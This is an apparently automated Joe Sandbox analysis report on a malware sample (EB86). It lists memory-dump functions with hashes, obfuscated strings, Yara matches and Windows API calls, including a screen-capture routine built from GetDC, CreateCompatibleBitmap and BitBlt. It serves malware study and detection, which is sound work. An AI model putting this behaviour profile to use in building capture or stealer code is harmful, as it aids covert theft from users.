                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8/d$8I>K$T`Sf$Wdz$&$$qs$uVw
                                                                                                                                                                                                                                                  • API String ID: 0-2973599404
                                                                                                                                                                                                                                                  • Opcode ID: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
                                                                                                                                                                                                                                                  • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc9d13701a6f1f84a1fbda366b061da39485b638189b278c3f43e1cc0e4d0b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                  • String ID: ~|$8/d$SP$if$pv$tj$vt
                                                                                                                                                                                                                                                  • API String ID: 3664257935-3249996398
                                                                                                                                                                                                                                                  • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                                                  • Instruction ID: ec28948933193ce4502e6cba0c223f9eeee13a7c1b364abab75eba6ad600e2eb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C620670689350AFE724CF18CC91B2FB7F2EFC9318F18862CE59597291D371A8458B96
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                                                                                                                                                                                                    • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00655ED0,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                  • String ID: ~|$8/d$SP$if$pv$tj$vt
                                                                                                                                                                                                                                                  • API String ID: 764372645-3249996398
                                                                                                                                                                                                                                                  • Opcode ID: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
                                                                                                                                                                                                                                                  • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0b58ed5ff15dc801148dc9f86a9132d6192a83ea1caeaa00bd99fa001171b69
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 5&'d$8/d$O$~
                                                                                                                                                                                                                                                  • API String ID: 0-1531159568
                                                                                                                                                                                                                                                  • Opcode ID: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
                                                                                                                                                                                                                                                  • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
                                                                                                                                                                                                                                                  • API String ID: 0-2187754830
                                                                                                                                                                                                                                                  • Opcode ID: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
                                                                                                                                                                                                                                                  • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                                                                                                                                                                                                  • API String ID: 237503144-816972838
                                                                                                                                                                                                                                                  • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                                                  • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                                  • API String ID: 0-102253164
                                                                                                                                                                                                                                                  • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                                  • Instruction ID: 693336ea85fcc3691c05f262cd1c3ccf420b974d1f10f178631e414cfb0562ac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A33238B19402118BCB24CF28C8927B7B7B2FF95314F29829DD841AF794E775A902CBD1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                                  • API String ID: 0-102253164
                                                                                                                                                                                                                                                  • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                                  • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 02168B0B
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02168B15
                                                                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02168BBC
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 02168BD1
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 02168D1E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                  • String ID: 6W01
                                                                                                                                                                                                                                                  • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                                  • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                                  • Instruction ID: ef920891a8683f2f8490b9df53ca0cfb4261b91120d842cf29670d5cd0b199fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9519C33A843040FD728AF64CC4936ABAD79BC1310F1FC1399985AB3E5EA74881687C5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: GetDC.USER32(00000000), ref: 02196BF0
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02196C11
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02196C21
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: DeleteObject.GDI32(00000000), ref: 02196C28
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: CreateCompatibleDC.GDI32(00000000), ref: 02196C37
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02196C42
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: SelectObject.GDI32(00000000,00000000), ref: 02196C4E
                                                                                                                                                                                                                                                    • Part of subcall function 02196BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02196C71
                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0216D7BC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                                  • String ID: &W-Q$9Y$?C*]$|qay$~wxH
                                                                                                                                                                                                                                                  • API String ID: 3248263802-1959178137
                                                                                                                                                                                                                                                  • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                                  • Instruction ID: d64a8785fb1b5922655d4daaca903a9dc154d7d82dc477e44cbbc13f831ae45d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76B115756447828BE725CF2AC4E0762BBE2FF96304B18C1ACC4D64FB4AD738A456CB51
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                                    • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0040D555
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                                  • String ID: &W-Q$9Y$?C*]$|qay$~wxH
                                                                                                                                                                                                                                                  • API String ID: 3213364925-1959178137
                                                                                                                                                                                                                                                  • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                                  • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                                                                                                                                                                                                  • API String ID: 0-3030200349
                                                                                                                                                                                                                                                  • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                                                  • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-1320392364
                                                                                                                                                                                                                                                  • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                                  • Instruction ID: 33c14b3dd8e556b6bb1c9d0d257617bd2fcc3fbb6d95f68222412c4c2d5ff5fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6491F96124C3818BD718DF3988A137AFBD29FD6218F28896DF4D6CB291D339C506CB16
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-1320392364
                                                                                                                                                                                                                                                  • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                                  • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                                                  • API String ID: 0-3770969982
                                                                                                                                                                                                                                                  • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                                                  • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 8/d$D`a&$NMNO$bX_^
                                                                                                                                                                                                                                                  • API String ID: 2994545307-4043978574
                                                                                                                                                                                                                                                  • Opcode ID: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
                                                                                                                                                                                                                                                  • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                                                  • API String ID: 0-3770969982
                                                                                                                                                                                                                                                  • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                                                  • Instruction ID: 302219231226957f85f38842a116535587710e3c441a26eac37571cbd7af3ecb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA71CFB654D3958BD704DF12C8802AFBBE2FBD1318F188E6CE5D85B251C739854A8F86
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: B:$C@$K3$bX_^
                                                                                                                                                                                                                                                  • API String ID: 0-595269213
                                                                                                                                                                                                                                                  • Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                                                  • Instruction ID: ac98e73513190f87351c477225c74d1024ae1257b834f24e2f2e77a0827e6994
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA41CEB5D102289FDB20EF79CD867DDBFB1AB85300F4442AAE448A7295D7340E498FD2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$NP,?$UA
                                                                                                                                                                                                                                                  • API String ID: 0-3133226710
                                                                                                                                                                                                                                                  • Opcode ID: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
                                                                                                                                                                                                                                                  • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d${wBy$?;;
                                                                                                                                                                                                                                                  • API String ID: 0-326893911
